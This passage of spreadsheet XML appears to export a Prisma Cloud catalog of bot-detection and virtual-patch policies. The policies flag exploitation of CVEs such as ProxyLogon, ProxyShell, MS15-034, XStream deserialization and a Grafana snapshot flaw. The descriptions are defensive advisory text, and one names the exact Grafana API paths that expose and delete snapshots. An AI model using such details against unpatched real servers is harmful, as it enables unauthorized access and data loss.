      <c r="D3436" t="inlineStr"/>
      <c r="E3436" t="inlineStr"/>
      <c r="F3436" t="inlineStr"/>
      <c r="G3436" t="b">
        <v>0</v>
      </c>
      <c r="H343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6" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J3436" t="inlineStr">
        <is>
          <t>known_bots_api</t>
        </is>
      </c>
      <c r="K3436" t="inlineStr">
        <is>
          <t>Search engine crawler activity</t>
        </is>
      </c>
      <c r="L3436" t="inlineStr">
        <is>
          <t>BOT_ACTIVITY</t>
        </is>
      </c>
      <c r="M3436" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N3436" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3436" t="inlineStr">
        <is>
          <t>api</t>
        </is>
      </c>
      <c r="P3436" t="inlineStr">
        <is>
          <t>known_bots</t>
        </is>
      </c>
      <c r="Q3436" t="inlineStr"/>
      <c r="R3436" t="inlineStr"/>
      <c r="S3436" t="inlineStr"/>
      <c r="T3436" t="b">
        <v>0</v>
      </c>
      <c r="U3436" t="inlineStr">
        <is>
          <t>bots</t>
        </is>
      </c>
      <c r="V3436" t="inlineStr">
        <is>
          <t>network_event_api</t>
        </is>
      </c>
      <c r="W3436" t="inlineStr">
        <is>
          <t>This policy identifies bots systematically crawling and indexing the world wide web to index pages for online searching. Also known as spider bots or web crawlers.</t>
        </is>
      </c>
      <c r="X343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6" t="inlineStr"/>
      <c r="Z3436" t="inlineStr"/>
      <c r="AA3436" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3436" t="inlineStr">
        <is>
          <t>2023-06-15 01:00:00</t>
        </is>
      </c>
      <c r="AC3436" t="inlineStr"/>
      <c r="AD3436" t="b">
        <v>1</v>
      </c>
      <c r="AE3436" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3436" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG343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6" t="inlineStr">
        <is>
          <t>4c960cb9-52b4-4a1a-b0a1-14ab32d50c92</t>
        </is>
      </c>
      <c r="AI3436" t="inlineStr"/>
      <c r="AJ3436" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK3436" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="3437">
      <c r="A3437" t="inlineStr"/>
      <c r="B3437" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3437" s="2" t="inlineStr"/>
      <c r="D3437" t="inlineStr"/>
      <c r="E3437" t="inlineStr"/>
      <c r="F3437" t="inlineStr"/>
      <c r="G3437" t="b">
        <v>1</v>
      </c>
      <c r="H343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7" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J3437" t="inlineStr">
        <is>
          <t>virtual_patches_api</t>
        </is>
      </c>
      <c r="K3437" t="inlineStr">
        <is>
          <t>Attempt to exploit known vulnerabilities (CVE-2022-0072, CVE-2022-0073, CVE-2022-0074 - OpenLiteSpeed Remote Code Execution) observed in HTTP traffic</t>
        </is>
      </c>
      <c r="L3437" t="inlineStr">
        <is>
          <t>WEB_ATTACK</t>
        </is>
      </c>
      <c r="M3437" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N3437" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3437" t="inlineStr">
        <is>
          <t>api</t>
        </is>
      </c>
      <c r="P3437" t="inlineStr">
        <is>
          <t>virtual_patches</t>
        </is>
      </c>
      <c r="Q3437" t="inlineStr"/>
      <c r="R3437" t="inlineStr"/>
      <c r="S3437" t="inlineStr">
        <is>
          <t>Attack Path Rule</t>
        </is>
      </c>
      <c r="T3437" t="b">
        <v>0</v>
      </c>
      <c r="U3437" t="inlineStr">
        <is>
          <t>bots</t>
        </is>
      </c>
      <c r="V3437" t="inlineStr">
        <is>
          <t>network_event_api</t>
        </is>
      </c>
      <c r="W3437" t="inlineStr">
        <is>
          <t>The policy utilizes custom detection techniques to identify known vulnerabilities with the aim of identifying targeted exploits.
Directory Traversal vulnerability in LiteSpeed Technologies OpenLiteSpeed Web Server and LiteSpeed Web Server dashboards allows Path Traversal. This affects versions from 1.5.11 through 1.5.12, from 1.6.5 through 1.6.20.1, from 1.7.0 before 1.7.16.1
Improper Input Validation vulnerability in LiteSpeed Technologies OpenLiteSpeed Web Server and LiteSpeed Web Server dashboards allows Command Injection. This affects 1.7.0 versions before 1.7.16.1.
Untrusted Search Path vulnerability in LiteSpeed Technologies OpenLiteSpeed Web Server and LiteSpeed Web Server Container allows Privilege Escalation. This affects versions from 1.6.15 before 1.7.16.1.</t>
        </is>
      </c>
      <c r="X343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7" t="inlineStr"/>
      <c r="Z3437" t="inlineStr"/>
      <c r="AA3437" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3437" t="inlineStr">
        <is>
          <t>2023-10-27 07:54:09</t>
        </is>
      </c>
      <c r="AC3437" t="inlineStr"/>
      <c r="AD3437" t="b">
        <v>1</v>
      </c>
      <c r="AE3437" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3437" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG343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7" t="inlineStr">
        <is>
          <t>20396de3-7fd0-46a5-82d5-33eb43bc7c8b</t>
        </is>
      </c>
      <c r="AI3437" t="inlineStr"/>
      <c r="AJ3437" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK3437" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="3438">
      <c r="A3438" t="inlineStr"/>
      <c r="B3438" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3438" s="2" t="inlineStr"/>
      <c r="D3438" t="inlineStr"/>
      <c r="E3438" t="inlineStr"/>
      <c r="F3438" t="inlineStr"/>
      <c r="G3438" t="b">
        <v>1</v>
      </c>
      <c r="H343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8" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J3438" t="inlineStr">
        <is>
          <t>virtual_patches_api</t>
        </is>
      </c>
      <c r="K3438" t="inlineStr">
        <is>
          <t>Attempt to exploit known vulnerabilities (CVE-2021-39226 - Grafana Snapshot authentication bypass) observed in HTTP traffic</t>
        </is>
      </c>
      <c r="L3438" t="inlineStr">
        <is>
          <t>WEB_ATTACK</t>
        </is>
      </c>
      <c r="M3438" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N3438" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3438" t="inlineStr">
        <is>
          <t>api</t>
        </is>
      </c>
      <c r="P3438" t="inlineStr">
        <is>
          <t>virtual_patches</t>
        </is>
      </c>
      <c r="Q3438" t="inlineStr"/>
      <c r="R3438" t="inlineStr"/>
      <c r="S3438" t="inlineStr">
        <is>
          <t>Attack Path Rule</t>
        </is>
      </c>
      <c r="T3438" t="b">
        <v>0</v>
      </c>
      <c r="U3438" t="inlineStr">
        <is>
          <t>bots</t>
        </is>
      </c>
      <c r="V3438" t="inlineStr">
        <is>
          <t>network_event_api</t>
        </is>
      </c>
      <c r="W3438" t="inlineStr">
        <is>
          <t>The policy utilizes custom detection techniques to identify known vulnerabilities with the aim of identifying targeted exploits.
Grafana is an open source data visualization platform. In affected versions unauthenticated and authenticated users are able to view the snapshot with the lowest database key by accessing the literal paths: /dashboard/snapshot/:key, or /api/snapshots/:key. If the snapshot "public_mode" configuration setting is set to true (vs default of false), unauthenticated users are able to delete the snapshot with the lowest database key by accessing the literal path: /api/snapshots-delete/:deleteKey. Regardless of the snapshot "public_mode" setting, authenticated users are able to delete the snapshot with the lowest database key by accessing the literal paths: /api/snapshots/:key, or /api/snapshots-delete/:deleteKey. The combination of deletion and viewing enables a complete walk through all snapshot data while resulting in complete snapshot data loss. This issue has been resolved in versions 8.1.6 and 7.5.11. If for some reason you cannot upgrade you can use a reverse proxy or similar to block access to the literal paths: /api/snapshots/:key, /api/snapshots-delete/:deleteKey, /dashboard/snapshot/:key, and /api/snapshots/:key. They have no normal function and can be disabled without side effects.</t>
        </is>
      </c>
      <c r="X3438"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8" t="inlineStr"/>
      <c r="Z3438" t="inlineStr"/>
      <c r="AA3438" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3438" t="inlineStr">
        <is>
          <t>2023-10-27 07:54:09</t>
        </is>
      </c>
      <c r="AC3438" t="inlineStr"/>
      <c r="AD3438" t="b">
        <v>1</v>
      </c>
      <c r="AE3438" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3438" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG343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8" t="inlineStr">
        <is>
          <t>5f098037-bfb9-4425-a7a3-2c1022112de2</t>
        </is>
      </c>
      <c r="AI3438" t="inlineStr"/>
      <c r="AJ3438" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK3438" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="3439">
      <c r="A3439" t="inlineStr"/>
      <c r="B3439" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3439" s="2" t="inlineStr"/>
      <c r="D3439" t="inlineStr"/>
      <c r="E3439" t="inlineStr"/>
      <c r="F3439" t="inlineStr"/>
      <c r="G3439" t="b">
        <v>1</v>
      </c>
      <c r="H343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39" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J3439" t="inlineStr">
        <is>
          <t>virtual_patches_api</t>
        </is>
      </c>
      <c r="K3439" t="inlineStr">
        <is>
          <t>Attempt to exploit known vulnerabilities (CVE-2021-26855 - ProxyLogon/HAFNIUM RCE Attack Chain) observed in HTTP traffic</t>
        </is>
      </c>
      <c r="L3439" t="inlineStr">
        <is>
          <t>WEB_ATTACK</t>
        </is>
      </c>
      <c r="M3439" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N3439" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3439" t="inlineStr">
        <is>
          <t>api</t>
        </is>
      </c>
      <c r="P3439" t="inlineStr">
        <is>
          <t>virtual_patches</t>
        </is>
      </c>
      <c r="Q3439" t="inlineStr"/>
      <c r="R3439" t="inlineStr"/>
      <c r="S3439" t="inlineStr">
        <is>
          <t>Attack Path Rule</t>
        </is>
      </c>
      <c r="T3439" t="b">
        <v>0</v>
      </c>
      <c r="U3439" t="inlineStr">
        <is>
          <t>bots</t>
        </is>
      </c>
      <c r="V3439" t="inlineStr">
        <is>
          <t>network_event_api</t>
        </is>
      </c>
      <c r="W3439" t="inlineStr">
        <is>
          <t>The policy utilizes custom detection techniques to identify known vulnerabilities with the aim of identifying targeted exploits.
Microsoft Exchange Server Remote Code Execution Vulnerability</t>
        </is>
      </c>
      <c r="X3439"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39" t="inlineStr"/>
      <c r="Z3439" t="inlineStr"/>
      <c r="AA3439" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3439" t="inlineStr">
        <is>
          <t>2023-10-27 07:54:09</t>
        </is>
      </c>
      <c r="AC3439" t="inlineStr"/>
      <c r="AD3439" t="b">
        <v>1</v>
      </c>
      <c r="AE3439" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3439" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG343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39" t="inlineStr">
        <is>
          <t>e0f51f3f-cb83-4ddf-ab6f-c26e3e3dde27</t>
        </is>
      </c>
      <c r="AI3439" t="inlineStr"/>
      <c r="AJ3439" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK3439" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="3440">
      <c r="A3440" t="inlineStr"/>
      <c r="B3440" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3440" s="2" t="inlineStr"/>
      <c r="D3440" t="inlineStr"/>
      <c r="E3440" t="inlineStr"/>
      <c r="F3440" t="inlineStr"/>
      <c r="G3440" t="b">
        <v>1</v>
      </c>
      <c r="H344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0" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J3440" t="inlineStr">
        <is>
          <t>virtual_patches_api</t>
        </is>
      </c>
      <c r="K3440" t="inlineStr">
        <is>
          <t>Attempt to exploit known vulnerabilities (CVE-2015-1635 - MS15-034 Microsoft IIS DoS or RCE) observed in HTTP traffic</t>
        </is>
      </c>
      <c r="L3440" t="inlineStr">
        <is>
          <t>WEB_ATTACK</t>
        </is>
      </c>
      <c r="M3440" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N3440" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3440" t="inlineStr">
        <is>
          <t>api</t>
        </is>
      </c>
      <c r="P3440" t="inlineStr">
        <is>
          <t>virtual_patches</t>
        </is>
      </c>
      <c r="Q3440" t="inlineStr"/>
      <c r="R3440" t="inlineStr"/>
      <c r="S3440" t="inlineStr">
        <is>
          <t>Attack Path Rule</t>
        </is>
      </c>
      <c r="T3440" t="b">
        <v>0</v>
      </c>
      <c r="U3440" t="inlineStr">
        <is>
          <t>bots</t>
        </is>
      </c>
      <c r="V3440" t="inlineStr">
        <is>
          <t>network_event_api</t>
        </is>
      </c>
      <c r="W3440" t="inlineStr">
        <is>
          <t>The policy utilizes custom detection techniques to identify known vulnerabilities with the aim of identifying targeted exploits.
HTTP.sys in Microsoft Windows 7 SP1, Windows Server 2008 R2 SP1, Windows 8, Windows 8.1, and Windows Server 2012 Gold and R2 allows remote attackers to execute arbitrary code via crafted HTTP requests, aka "HTTP.sys Remote Code Execution Vulnerability."</t>
        </is>
      </c>
      <c r="X3440"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0" t="inlineStr"/>
      <c r="Z3440" t="inlineStr"/>
      <c r="AA3440" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3440" t="inlineStr">
        <is>
          <t>2023-10-27 07:54:09</t>
        </is>
      </c>
      <c r="AC3440" t="inlineStr"/>
      <c r="AD3440" t="b">
        <v>1</v>
      </c>
      <c r="AE3440" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3440" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG344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0" t="inlineStr">
        <is>
          <t>71a73b5a-bead-45b5-8a9c-4c9f3e726577</t>
        </is>
      </c>
      <c r="AI3440" t="inlineStr"/>
      <c r="AJ3440" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK3440" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="3441">
      <c r="A3441" t="inlineStr"/>
      <c r="B3441" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3441" s="2" t="inlineStr"/>
      <c r="D3441" t="inlineStr"/>
      <c r="E3441" t="inlineStr"/>
      <c r="F3441" t="inlineStr"/>
      <c r="G3441" t="b">
        <v>1</v>
      </c>
      <c r="H344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1" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J3441" t="inlineStr">
        <is>
          <t>virtual_patches_api</t>
        </is>
      </c>
      <c r="K3441" t="inlineStr">
        <is>
          <t>Attempt to exploit known vulnerabilities (CVE-2021-32648 - OctocberCMS) observed in HTTP traffic</t>
        </is>
      </c>
      <c r="L3441" t="inlineStr">
        <is>
          <t>WEB_ATTACK</t>
        </is>
      </c>
      <c r="M3441" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N3441" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3441" t="inlineStr">
        <is>
          <t>api</t>
        </is>
      </c>
      <c r="P3441" t="inlineStr">
        <is>
          <t>virtual_patches</t>
        </is>
      </c>
      <c r="Q3441" t="inlineStr"/>
      <c r="R3441" t="inlineStr"/>
      <c r="S3441" t="inlineStr">
        <is>
          <t>Attack Path Rule</t>
        </is>
      </c>
      <c r="T3441" t="b">
        <v>0</v>
      </c>
      <c r="U3441" t="inlineStr">
        <is>
          <t>bots</t>
        </is>
      </c>
      <c r="V3441" t="inlineStr">
        <is>
          <t>network_event_api</t>
        </is>
      </c>
      <c r="W3441" t="inlineStr">
        <is>
          <t>The policy utilizes custom detection techniques to identify known vulnerabilities with the aim of identifying targeted exploits.
octobercms in a CMS platform based on the Laravel PHP Framework. In affected versions of the october/system package an attacker can request an account password reset and then gain access to the account using a specially crafted request. The issue has been patched in Build 472 and v1.1.5.</t>
        </is>
      </c>
      <c r="X3441"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1" t="inlineStr"/>
      <c r="Z3441" t="inlineStr"/>
      <c r="AA3441" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3441" t="inlineStr">
        <is>
          <t>2023-10-27 07:54:09</t>
        </is>
      </c>
      <c r="AC3441" t="inlineStr"/>
      <c r="AD3441" t="b">
        <v>1</v>
      </c>
      <c r="AE3441" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3441" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG344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1" t="inlineStr">
        <is>
          <t>882d14a6-7eb4-4a91-b9fe-e2b22cb9d16d</t>
        </is>
      </c>
      <c r="AI3441" t="inlineStr"/>
      <c r="AJ3441" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK3441" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="3442">
      <c r="A3442" t="inlineStr"/>
      <c r="B3442" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3442" s="2" t="inlineStr"/>
      <c r="D3442" t="inlineStr"/>
      <c r="E3442" t="inlineStr"/>
      <c r="F3442" t="inlineStr"/>
      <c r="G3442" t="b">
        <v>1</v>
      </c>
      <c r="H344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2" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J3442" t="inlineStr">
        <is>
          <t>unknown_bots_api</t>
        </is>
      </c>
      <c r="K3442" t="inlineStr">
        <is>
          <t>Generic bot activity</t>
        </is>
      </c>
      <c r="L3442" t="inlineStr">
        <is>
          <t>BOT_ACTIVITY</t>
        </is>
      </c>
      <c r="M3442" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N3442" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3442" t="inlineStr">
        <is>
          <t>api</t>
        </is>
      </c>
      <c r="P3442" t="inlineStr">
        <is>
          <t>unknown_bots</t>
        </is>
      </c>
      <c r="Q3442" t="inlineStr"/>
      <c r="R3442" t="inlineStr"/>
      <c r="S3442" t="inlineStr"/>
      <c r="T3442" t="b">
        <v>0</v>
      </c>
      <c r="U3442" t="inlineStr">
        <is>
          <t>bots</t>
        </is>
      </c>
      <c r="V3442" t="inlineStr">
        <is>
          <t>network_event_api</t>
        </is>
      </c>
      <c r="W3442" t="inlineStr">
        <is>
          <t>This policy detects automated web clients with clear attributes in each request that indicate them as bots</t>
        </is>
      </c>
      <c r="X3442"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2" t="inlineStr"/>
      <c r="Z3442" t="inlineStr"/>
      <c r="AA3442" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3442" t="inlineStr">
        <is>
          <t>2024-02-21 07:55:14</t>
        </is>
      </c>
      <c r="AC3442" t="inlineStr"/>
      <c r="AD3442" t="b">
        <v>1</v>
      </c>
      <c r="AE3442" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3442" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG344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2" t="inlineStr">
        <is>
          <t>40164be3-6137-4887-965b-f22b3ce22a88</t>
        </is>
      </c>
      <c r="AI3442" t="inlineStr"/>
      <c r="AJ3442" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK3442" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="3443">
      <c r="A3443" t="inlineStr"/>
      <c r="B3443" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3443" s="2" t="inlineStr"/>
      <c r="D3443" t="inlineStr"/>
      <c r="E3443" t="inlineStr"/>
      <c r="F3443" t="inlineStr"/>
      <c r="G3443" t="b">
        <v>1</v>
      </c>
      <c r="H344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3" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J3443" t="inlineStr">
        <is>
          <t>unknown_bots_api</t>
        </is>
      </c>
      <c r="K3443" t="inlineStr">
        <is>
          <t>Web client sent an HTTP request using a method other than GET without successfully completing a reCAPTCHA challenge</t>
        </is>
      </c>
      <c r="L3443" t="inlineStr">
        <is>
          <t>BOT_ACTIVITY</t>
        </is>
      </c>
      <c r="M3443" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N3443" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3443" t="inlineStr">
        <is>
          <t>api</t>
        </is>
      </c>
      <c r="P3443" t="inlineStr">
        <is>
          <t>unknown_bots</t>
        </is>
      </c>
      <c r="Q3443" t="inlineStr"/>
      <c r="R3443" t="inlineStr"/>
      <c r="S3443" t="inlineStr"/>
      <c r="T3443" t="b">
        <v>0</v>
      </c>
      <c r="U3443" t="inlineStr">
        <is>
          <t>bots</t>
        </is>
      </c>
      <c r="V3443" t="inlineStr">
        <is>
          <t>network_event_api</t>
        </is>
      </c>
      <c r="W3443" t="inlineStr">
        <is>
          <t>This policy requires clients who initiate HTTP requests using any method other than GET to successfully complete a reCAPTCHA challenge. These challenges are specifically presented for GET HTTP requests. Requests made using different methods will be intercepted by Prisma Cloud until a successful reCAPTCHA challenge completion occurs, and an event will be logged to record this action.</t>
        </is>
      </c>
      <c r="X3443"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3" t="inlineStr"/>
      <c r="Z3443" t="inlineStr"/>
      <c r="AA3443" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3443" t="inlineStr">
        <is>
          <t>2024-05-10 07:06:32</t>
        </is>
      </c>
      <c r="AC3443" t="inlineStr"/>
      <c r="AD3443" t="b">
        <v>1</v>
      </c>
      <c r="AE3443" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3443" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG344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3" t="inlineStr">
        <is>
          <t>c6079592-140c-4915-b843-6602bb7ccd4f</t>
        </is>
      </c>
      <c r="AI3443" t="inlineStr"/>
      <c r="AJ3443" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK3443" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="3444">
      <c r="A3444" t="inlineStr"/>
      <c r="B3444" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3444" s="2" t="inlineStr"/>
      <c r="D3444" t="inlineStr"/>
      <c r="E3444" t="inlineStr"/>
      <c r="F3444" t="inlineStr"/>
      <c r="G3444" t="b">
        <v>1</v>
      </c>
      <c r="H344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4" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J3444" t="inlineStr">
        <is>
          <t>virtual_patches_api</t>
        </is>
      </c>
      <c r="K3444" t="inlineStr">
        <is>
          <t>Attempt to exploit known vulnerabilities (CVE-2021-39144 - Unsafe Deserialization in XStream) observed in HTTP traffic</t>
        </is>
      </c>
      <c r="L3444" t="inlineStr">
        <is>
          <t>WEB_ATTACK</t>
        </is>
      </c>
      <c r="M3444" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N3444" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3444" t="inlineStr">
        <is>
          <t>api</t>
        </is>
      </c>
      <c r="P3444" t="inlineStr">
        <is>
          <t>virtual_patches</t>
        </is>
      </c>
      <c r="Q3444" t="inlineStr"/>
      <c r="R3444" t="inlineStr"/>
      <c r="S3444" t="inlineStr">
        <is>
          <t>Attack Path Rule</t>
        </is>
      </c>
      <c r="T3444" t="b">
        <v>0</v>
      </c>
      <c r="U3444" t="inlineStr">
        <is>
          <t>bots</t>
        </is>
      </c>
      <c r="V3444" t="inlineStr">
        <is>
          <t>network_event_api</t>
        </is>
      </c>
      <c r="W3444" t="inlineStr">
        <is>
          <t>The policy utilizes custom detection techniques to identify known vulnerabilities with the aim of identifying targeted exploits. XStream is a simple library to serialize objects to XML and back again. In affected versions this vulnerability may allow a remote attacker has sufficient rights to execute commands of the host only by manipulating the processed input stream</t>
        </is>
      </c>
      <c r="X3444"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4" t="inlineStr"/>
      <c r="Z3444" t="inlineStr"/>
      <c r="AA3444" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3444" t="inlineStr">
        <is>
          <t>2024-06-21 07:13:08</t>
        </is>
      </c>
      <c r="AC3444" t="inlineStr"/>
      <c r="AD3444" t="b">
        <v>1</v>
      </c>
      <c r="AE3444" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3444" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG344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4" t="inlineStr">
        <is>
          <t>06a8c8af-cc1c-4851-a813-c69593ad6099</t>
        </is>
      </c>
      <c r="AI3444" t="inlineStr"/>
      <c r="AJ3444" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK3444" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="3445">
      <c r="A3445" t="inlineStr"/>
      <c r="B3445" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3445" s="2" t="inlineStr"/>
      <c r="D3445" t="inlineStr"/>
      <c r="E3445" t="inlineStr"/>
      <c r="F3445" t="inlineStr"/>
      <c r="G3445" t="b">
        <v>0</v>
      </c>
      <c r="H344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5" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J3445" t="inlineStr">
        <is>
          <t>known_bots_api</t>
        </is>
      </c>
      <c r="K3445" t="inlineStr">
        <is>
          <t>Archiving Bot activity</t>
        </is>
      </c>
      <c r="L3445" t="inlineStr">
        <is>
          <t>BOT_ACTIVITY</t>
        </is>
      </c>
      <c r="M3445" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N3445" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3445" t="inlineStr">
        <is>
          <t>api</t>
        </is>
      </c>
      <c r="P3445" t="inlineStr">
        <is>
          <t>known_bots</t>
        </is>
      </c>
      <c r="Q3445" t="inlineStr"/>
      <c r="R3445" t="inlineStr"/>
      <c r="S3445" t="inlineStr"/>
      <c r="T3445" t="b">
        <v>0</v>
      </c>
      <c r="U3445" t="inlineStr">
        <is>
          <t>bots</t>
        </is>
      </c>
      <c r="V3445" t="inlineStr">
        <is>
          <t>network_event_api</t>
        </is>
      </c>
      <c r="W3445" t="inlineStr">
        <is>
          <t>This policy detects bots that crawl, extract and archive web site information.</t>
        </is>
      </c>
      <c r="X3445"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5" t="inlineStr"/>
      <c r="Z3445" t="inlineStr"/>
      <c r="AA3445" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3445" t="inlineStr">
        <is>
          <t>2024-02-21 07:55:14</t>
        </is>
      </c>
      <c r="AC3445" t="inlineStr"/>
      <c r="AD3445" t="b">
        <v>1</v>
      </c>
      <c r="AE3445" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3445" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG344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5" t="inlineStr">
        <is>
          <t>86c685f8-75be-4e6e-9288-1527d2fa7698</t>
        </is>
      </c>
      <c r="AI3445" t="inlineStr"/>
      <c r="AJ3445" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK3445" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="3446">
      <c r="A3446" t="inlineStr"/>
      <c r="B3446" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3446" s="2" t="inlineStr"/>
      <c r="D3446" t="inlineStr"/>
      <c r="E3446" t="inlineStr"/>
      <c r="F3446" t="inlineStr"/>
      <c r="G3446" t="b">
        <v>1</v>
      </c>
      <c r="H3446"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6" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J3446" t="inlineStr">
        <is>
          <t>virtual_patches_api</t>
        </is>
      </c>
      <c r="K3446" t="inlineStr">
        <is>
          <t>Attempt to exploit known vulnerabilities (CVE-2021-34473 - ProxyShell) observed in HTTP traffic</t>
        </is>
      </c>
